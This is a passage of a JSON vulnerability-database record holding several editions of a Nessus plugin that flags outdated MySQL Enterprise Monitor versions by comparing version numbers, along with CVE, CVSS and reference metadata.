"9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "8ab1f567e4aa80308aeef6d3dc1b8d12", "key": "cvelist"}, {"hash": "8092ad969248a1b4d8636eca3ec2a19b", "key": "href"}, {"hash": "62cb1ea79c688141f1b71e9bb4ad1bf0", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "84813b1457b92d6ba1174abffbb83a2f", "key": "cvss"}, {"hash": "2564b7c1ef9bc4ce2016e6e8db1e4f45", "key": "modified"}, {"hash": "dcd15f8243d978b250e66e777bc5c536", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=103536", "id": "MYSQL_ENTERPRISE_MONITOR_3_4_3_4225.NASL", "lastseen": "2017-10-20T00:46:24", "modified": "2017-10-19T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "103536", "published": "2017-09-28T00:00:00", "references": ["http://www.nessus.org/u?6b8727c4", "http://www.nessus.org/u?81106b10"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103536);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2017/10/19 13:36:03 $\");\n\n script_cve_id(\n \"CVE-2017-5664\",\n \"CVE-2017-9787\",\n \"CVE-2017-10424\"\n );\n script_bugtraq_id(\n 98888,\n 99562,\n 101381\n );\n script_osvdb_id(\n 158615,\n 167527,\n 160704\n );\n\n script_name(english:\"MySQL Enterprise Monitor 3.2.x < 3.2.9.2249 / 3.3.x < 3.3.5.3292 / 3.4.x < 3.4.3.4225 Multiple Vulnerabilities (October 2017 CPU)\");\n script_summary(english:\"Checks the version of MySQL Enterprise Monitor.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by a denial\nof service vulnerability in apache struts 2.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the MySQL Enterprise Monitor\napplication running on the remote host is 3.2.x prior to 3.2.9.2249,\n3.3.x prior to 3.3.5.3292, or 3.4.x prior to 3.4.3.4225.\nIt is, therefore, affected by multiple vulnerabilities as\nnoted in the October 2017 Critical Patch Update advisory. Please\nconsult the CVRF details for the applicable CVEs for additional\ninformation.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://www.oracle.com/technetwork/security-advisory/cve-2017-9805-products-3905487.html#AppendixMSQL\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?81106b10\");\n # http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html#AppendixMSQL\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6b8727c4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL Enterprise Monitor version 3.2.9.2249 / 3.3.5.3292 / \n3.4.3.4225 or later as referenced in the Oracle security advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:mysql_enterprise_monitor\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017 Tenable Network Security, Inc.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 18443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp = \"MySQL Enterprise Monitor\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:18443);\ninstall = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);\nversion = install['version'];\ninstall_url = build_url(port:port, qs:\"/\");\n\nfixes = { \n \"^3.4\": \"3.4.3.4225\",\n \"^3.3\": \"3.3.5.3292\",\n \"^3.2\": \"3.2.9.2249\"\n };\n\nvuln = FALSE;\nfix = '';\nforeach (prefix in keys(fixes))\n{\n if (version =~ prefix && ver_compare(ver:version,\n fix:fixes[prefix],\n strict:FALSE) < 0)\n {\n vuln = TRUE;\n fix = fixes[prefix];\n break;\n }\n}\n\nif (vuln)\n{\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "title": "MySQL Enterprise Monitor 3.2.x < 3.2.9.2249 / 3.3.x < 3.3.5.3292 / 3.4.x < 3.4.3.4225 Multiple Vulnerabilities (October 2017 CPU)", "type": "nessus", "viewCount": 2}, "differentElements": ["sourceData"], "edition": 4, "lastseen": "2017-10-20T00:46:24"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:oracle:mysql_enterprise_monitor"], "cvelist": ["CVE-2017-10424", "CVE-2017-9787", "CVE-2017-5664"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "According to its self-reported version, the MySQL Enterprise Monitor application running on the remote host is 3.2.x prior to 3.2.9.2249, 3.3.x prior to 3.3.5.3292, or 3.4.x prior to 3.4.3.4225.\nIt is, therefore, affected by multiple vulnerabilities as noted in the October 2017 Critical Patch Update advisory. Please consult the CVRF details for the applicable CVEs for additional information.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "edition": 11, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "4abc9b4c88f20c402600bbf2095c14fcaa46035a67a9eff784de126953686de4", "hashmap": [{"hash": "1b80047fc25e133e710f5dd7f80138f4", "key": "published"}, {"hash": "df1253a0a9be0794c965ef6df2b50759", "key": "modified"}, {"hash": "3580dadbeebc05c7250daf4499071182", "key": "references"}, {"hash": "e11ceae9cbda27e0a9b7e80058362e68", "key": "description"}, {"hash": "e2fc8dd594cf5168a42506e1aadc6c33", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "05563150ffcb36d2c59eb107ca4fd7d6", "key": "sourceData"}, {"hash": "8ab1f567e4aa80308aeef6d3dc1b8d12", "key": "cvelist"}, {"hash": "8092ad969248a1b4d8636eca3ec2a19b", "key": "href"}, {"hash": "ca47b68c1cdb8725513d34a942f523da", "key": "cpe"}, {"hash": "62cb1ea79c688141f1b71e9bb4ad1bf0", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=103536", "id": "MYSQL_ENTERPRISE_MONITOR_3_4_3_4225.NASL", "lastseen": "2018-06-15T13:55:30", "modified": "2018-06-14T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "103536", "published": "2017-09-28T00:00:00", "references": ["http://www.nessus.org/u?6b8727c4", "http://www.nessus.org/u?81106b10"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103536);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/06/14 12:21:48\");\n\n script_cve_id(\n \"CVE-2017-5664\",\n \"CVE-2017-9787\",\n \"CVE-2017-10424\"\n );\n script_bugtraq_id(\n 98888,\n 99562,\n 101381\n );\n\n script_name(english:\"MySQL Enterprise Monitor 3.2.x < 3.2.9.2249 / 3.3.x < 3.3.5.3292 / 3.4.x < 3.4.3.4225 Multiple Vulnerabilities (October 2017 CPU)\");\n script_summary(english:\"Checks the version of MySQL Enterprise Monitor.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by a denial\nof service vulnerability in apache struts 2.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the MySQL Enterprise Monitor\napplication running on the remote host is 3.2.x prior to 3.2.9.2249,\n3.3.x prior to 3.3.5.3292, or 3.4.x prior to 3.4.3.4225.\nIt is, therefore, affected by multiple vulnerabilities as\nnoted in the October 2017 Critical Patch Update advisory. Please\nconsult the CVRF details for the applicable CVEs for additional\ninformation.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://www.oracle.com/technetwork/security-advisory/cve-2017-9805-products-3905487.html#AppendixMSQL\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?81106b10\");\n # http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html#AppendixMSQL\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6b8727c4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL Enterprise Monitor version 3.2.9.2249 / 3.3.5.3292 / \n3.4.3.4225 or later as referenced in the Oracle security advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:mysql_enterprise_monitor\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 18443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp = \"MySQL Enterprise Monitor\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:18443);\ninstall = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);\nversion = install['version'];\ninstall_url = build_url(port:port, qs:\"/\");\n\nfixes = { \n \"^3.4\": \"3.4.3.4225\",\n \"^3.3\": \"3.3.5.3292\",\n \"^3.2\": \"3.2.9.2249\"\n };\n\nvuln = FALSE;\nfix = '';\nforeach (prefix in keys(fixes))\n{\n if (version =~ prefix && ver_compare(ver:version,\n fix:fixes[prefix],\n strict:FALSE) < 0)\n {\n vuln = TRUE;\n fix = fixes[prefix];\n break;\n }\n}\n\nif (vuln)\n{\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "title": "MySQL Enterprise Monitor 3.2.x < 3.2.9.2249 / 3.3.x < 3.3.5.3292 / 3.4.x < 3.4.3.4225 Multiple Vulnerabilities (October 2017 CPU)", "type": "nessus", "viewCount": 4}, "differentElements": ["cvss"], "edition": 11, "lastseen": "2018-06-15T13:55:30"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:oracle:mysql_enterprise_monitor"], "cvelist": ["CVE-2017-10424", "CVE-2017-9787", "CVE-2017-5664"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "According to its self-reported version, the MySQL Enterprise Monitor application running on the remote host is 3.2.x prior to 3.2.9.2249, 3.3.x prior to 3.3.5.3292, or 3.4.x prior to 3.4.3.4225.\nIt is, therefore, affected by multiple vulnerabilities as noted in the October 2017 Critical Patch Update advisory. Please consult the CVRF details for the applicable CVEs for additional information.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "edition": 9, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "6ea81377c67e98e38db09581291009d686b7db254db1968fcfe84bb9711822b9", "hashmap": [{"hash": "1b80047fc25e133e710f5dd7f80138f4", "key": "published"}, {"hash": "3580dadbeebc05c7250daf4499071182", "key": "references"}, {"hash": "e11ceae9cbda27e0a9b7e80058362e68", "key": "description"}, {"hash": "e2fc8dd594cf5168a42506e1aadc6c33", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "8ab1f567e4aa80308aeef6d3dc1b8d12", "key": "cvelist"}, {"hash": "a33bebef620bda31df91a6b5bbbb6ddc", "key": "sourceData"}, {"hash": "8092ad969248a1b4d8636eca3ec2a19b", "key": "href"}, {"hash": "ca47b68c1cdb8725513d34a942f523da", "key": "cpe"}, {"hash": "62cb1ea79c688141f1b71e9bb4ad1bf0", "key": "title"}, {"hash": "2bd1a888d4d32830ca7e123d42f56c1e", "key": "modified"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=103536", "id": "MYSQL_ENTERPRISE_MONITOR_3_4_3_4225.NASL", "lastseen": "2018-01-19T03:18:04", "modified": "2018-01-18T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "103536", "published": "2017-09-28T00:00:00", "references": ["http://www.nessus.org/u?6b8727c4", "http://www.nessus.org/u?81106b10"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103536);\n script_version(\"$Revision: 1.7 $\");\n script_cvs_date(\"$Date: 2018/01/18 17:46:05 $\");\n\n script_cve_id(\n \"CVE-2017-5664\",\n \"CVE-2017-9787\",\n \"CVE-2017-10424\"\n );\n script_bugtraq_id(\n 98888,\n 99562,\n 101381\n );\n script_osvdb_id(\n 158615,\n 167527,\n 160704\n );\n\n script_name(english:\"MySQL Enterprise Monitor 3.2.x < 3.2.9.2249 / 3.3.x < 3.3.5.3292 / 3.4.x < 3.4.3.4225 Multiple Vulnerabilities (October 2017 CPU)\");\n script_summary(english:\"Checks the version of MySQL Enterprise Monitor.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by a denial\nof service vulnerability in apache struts 2.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the MySQL Enterprise Monitor\napplication running on the remote host is 3.2.x prior to 3.2.9.2249,\n3.3.x prior to 3.3.5.3292, or 3.4.x prior to 3.4.3.4225.\nIt is, therefore, affected by multiple vulnerabilities as\nnoted in the October 2017 Critical Patch Update advisory. Please\nconsult the CVRF details for the applicable CVEs for additional\ninformation.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://www.oracle.com/technetwork/security-advisory/cve-2017-9805-products-3905487.html#AppendixMSQL\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?81106b10\");\n # http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html#AppendixMSQL\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6b8727c4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL Enterprise Monitor version 3.2.9.2249 / 3.3.5.3292 / \n3.4.3.4225 or later as referenced in the Oracle security advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:mysql_enterprise_monitor\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 18443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp = \"MySQL Enterprise Monitor\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:18443);\ninstall = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);\nversion = install['version'];\ninstall_url = build_url(port:port, qs:\"/\");\n\nfixes = { \n \"^3.4\": \"3.4.3.4225\",\n \"^3.3\": \"3.3.5.3292\",\n \"^3.2\": \"3.2.9.2249\"\n };\n\nvuln = FALSE;\nfix = '';\nforeach (prefix in keys(fixes))\n{\n if (version =~ prefix && ver_compare(ver:version,\n fix:fixes[prefix],\n strict:FALSE) < 0)\n {\n vuln = TRUE;\n fix = fixes[prefix];\n break;\n }\n}\n\nif (vuln)\n{\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "title": "MySQL Enterprise Monitor 3.2.x < 3.2.9.2249 / 3.3.x < 3.3.5.3292 / 3.4.x < 3.4.3.4225 Multiple Vulnerabilities (October 2017 CPU)", "type": "nessus", "viewCount": 4}, "differentElements": ["modified", "sourceData"], "edition": 9, "lastseen": "2018-01-19T03:18:04"}], "edition": 22, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "ca47b68c1cdb8725513d34a942f523da"}, {"key": "cvelist", "hash": "f795c3e55223861af7c942933819173e"}, {"key": "cvss", "hash": "4cac367be6dd8242802053610be9dee6"}, {"key": "description", "hash": "01a22de365e4ed34b8cb47089acda2dc"}, {"key": "href", "hash": "d6d98acecf4b44e3e7cce8dcc7153864"}, {"key": "modified", "hash": "248ddfee5cc8aa2c1a4fce14baf1e1b1"}, {"key": "naslFamily", "hash": "07948b8ff59e8dda0b01012f70f00327"}, {"key": "pluginID", "hash": "e2fc8dd594cf5168a42506e1aadc6c33"}, {"key": "published", "hash": "1b80047fc25e133e710f5dd7f80138f4"}, {"key": "references", "hash": "bd5aeea5a01a71324a958bdbc8e2eb65"}, {"key": "reporter", "hash": "242645d9d5e13438e87b93ab155d704d"}, {"key": "sourceData", "hash": "d9224edeadb06d401803758615df1354"}, {"key": "title", "hash": "62cb1ea79c688141f1b71e9bb4ad1bf0"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "6e40cc753001e7197c9af777f2fd6814102f56adb04a8d271412f1ef1ee32764", "viewCount": 11, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-10424", "CVE-2017-9787", "CVE-2017-5664", "CVE-2017-9805"]}, {"type": "f5", "idList": ["F5:K51433470", "F5:K86300800", "F5:K01225001", "F5:K84144321"]}, {"type": "seebug", "idList": ["SSV:96420", "SSV:96562"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:3B3A927B1B8E5A80A8EA38A6AACF98EE"]}, {"type": "pentestit", "idList": ["PENTESTIT:37744BAB82BC3A7B208CCD4945FA50F7"]}, {"type": "myhack58", "idList": ["MYHACK58:62201788199", "MYHACK58:62201786929", "MYHACK58:62201789104", "MYHACK58:62201789130"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:D4ED0576717DBEEDCF6B9B98BADC92BD", "IMPERVABLOG:38007E943B20A50B729BC17911999C11", "IMPERVABLOG:81785CACF2722C5387530DCFDE54E6E4", "IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713"]}, {"type": "nessus", "idList": ["STRUTS_2_3_33.NASL", "FEDORA_2017-E4638A345C.NASL", "ALA_ALAS-2017-854.NASL", "DEBIAN_DSA-3892.NASL", "DEBIAN_DSA-3891.NASL", "STRUTS_2_5_13_REST_RCE.NASL", "DEBIAN_DLA-996.NASL", "FEDORA_2017-794C18B62D.NASL", "FEDORA_2017-63789C8C29.NASL", "ALA_ALAS-2017-853.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106957", "OPENVAS:1361412562310106956", "OPENVAS:1361412562310811730", "OPENVAS:1361412562310703891", "OPENVAS:1361412562310703892", "OPENVAS:1361412562310811305", "OPENVAS:1361412562310811140", "OPENVAS:703891", "OPENVAS:703892", "OPENVAS:1361412562310811306"]}, {"type": "github", "idList": ["GHSA-8MR5-H28G-36QX", "GHSA-GG9M-FJ3V-R58C"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:2E02CB122DC8C3DB57EF3830829E9913"]}, {"type": "zdt", "idList": ["1337DAY-ID-28445", "1337DAY-ID-28454"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:144034", "PACKETSTORM:144050"]}, {"type": "saint", "idList": ["SAINT:49062325B1FAB54D731E4C8FBF78D940", "SAINT:1AF820E0642E7888070E0C7DD723BBAE"]}, {"type": "debian", "idList": ["DEBIAN:DLA-996-1:D223D", "DEBIAN:DSA-3892-1:576B2", "DEBIAN:DSA-3891-1:F49C7"]}, {"type": "cert", "idList": ["VU:112992"]}, {"type": "dsquare", "idList": ["E-643"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/STRUTS2_REST_XSTREAM"]}, {"type": "exploitdb", "idList": ["EDB-ID:42627"]}, {"type": "thn", "idList": ["THN:460709FF530ED7F35B5817A55F1BF2C6", "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "THN:89C2482FECD181DD37C6DAEEB7A66FA9"]}, {"type": "amazon", "idList": ["ALAS-2017-853", "ALAS-2017-854", "ALAS-2017-862", "ALAS-2017-873"]}, {"type": "redhat", "idList": ["RHSA-2017:1809", "RHSA-2017:2637", "RHSA-2017:2635", "RHSA-2017:2636"]}, {"type": "centos", "idList": ["CESA-2017:1809"]}, {"type": "threatpost", "idList": ["THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "THREATPOST:477B6029652B76463B5C5B7155CDF736", "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B"]}, {"type": "talosblog", "idList": ["TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB", "TALOSBLOG:DAD87115458AF1FB5EDF5A2BB21D8AB9"]}, {"type": "suse", "idList": ["SUSE-SU-2017:3039-1", "OPENSUSE-SU-2017:3069-1", "SUSE-SU-2017:3279-1"]}, {"type": "oraclelinux", "idList": ["ELSA-2017-1809"]}, {"type": "cisco", "idList": ["CISCO-SA-20170907-STRUTS2"]}], "modified": "2020-02-01T00:49:08"}, "score": {"value": 7.2, "vector": "NONE", "modified": "2020-02-01T00:49:08"}, "vulnersScore": 7.2}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103536);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\"CVE-2017-5664\", \"CVE-2017-9787\", \"CVE-2017-10424\");\n script_bugtraq_id(98888, 99562, 101381);\n\n script_name(english:\"MySQL Enterprise Monitor 3.2.x < 3.2.9.2249 / 3.3.x < 3.3.5.3292 / 3.4.x < 3.4.3.4225 Multiple Vulnerabilities (October 2017 CPU)\");\n script_summary(english:\"Checks the version of MySQL Enterprise Monitor.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by a denial\nof service vulnerability in apache struts 2.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the MySQL Enterprise Monitor\napplication running on the remote host is 3.2.x prior to 3.2.9.2249,\n3.3.x prior to 3.3.5.3292, or 3.4.x prior to 3.4.3.4225.\nIt is, therefore, affected by multiple vulnerabilities as\nnoted in the October 2017 Critical Patch Update advisory. Please\nconsult the CVRF details for the applicable CVEs for additional\ninformation.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.oracle.com/technetwork/security-advisory/cve-2017-9805-products-3905487.html#AppendixMSQL\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0d67d494\");\n # http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html#AppendixMSQL\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6b8727c4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL Enterprise Monitor version 3.2.9.2249 / 3.3.5.3292 / \n3.4.3.4225 or later as referenced in the Oracle security advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10424\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/28\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:mysql_enterprise_monitor\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 18443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp = \"MySQL Enterprise Monitor\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:18443);\ninstall = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);\nversion = install['version'];\ninstall_url = build_url(port:port, qs:\"/\");\n\nfixes = { \n \"^3.4\": \"3.4.3.4225\",\n \"^3.3\": \"3.3.5.3292\",\n \"^3.2\": 